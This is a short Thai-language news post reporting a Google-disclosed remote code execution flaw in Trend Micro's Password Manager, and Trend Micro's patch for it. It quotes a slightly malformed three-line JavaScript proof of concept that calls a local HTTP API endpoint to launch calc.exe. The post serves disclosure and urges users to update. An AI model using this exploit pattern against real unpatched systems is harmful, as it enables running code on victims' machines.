นักวิจัยของ Google ได้ออกมาเปิดเผยถึงบั๊ก Remote Code Execution บน Antivirus ของ Trend Micro ในส่วนของระบบ Password Manager ที่มีการเปิด HTTP RPC Port มากมายสำหรับรับการเรียก API ต่างๆ ด้วยโค้ด JavaScript ที่ทำงานบน node.js ทำให้ผู้โจมตีสามารถเรียกคำสั่งแบบนี้ได้
x = new XMLHttpRequest()
x.open(“GET”, “https://localhost:49155/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe true);
try { x.send(); } catch (e) {};
ปัญหานี้ถูกรายงานเข้ามา 6 วันก่อน และทีมงาน Trend Micro ก็ได้ออก Patch เพื่ออุดช่องโหว่แล้วในวันนี้โดยที่ยังไม่มีรายงานการโจมตีที่เกิดขึ้นจากช่องโหว่นี้แต่อย่างใด (แต่คงจะเริ่มมีวันนี้แหละถ้าไม่อัพเดตกัน) ใครใช้ Antivirus ของ Trend Micro ก็รีบอัพเดตกันนะครับ
ที่มา: http://blog.trendmicro.com/information-on-reported-vulnerabilities-in-trend-micro-password-manager/ , https://code.google.com/p/google-security-research/issues/detail?id=693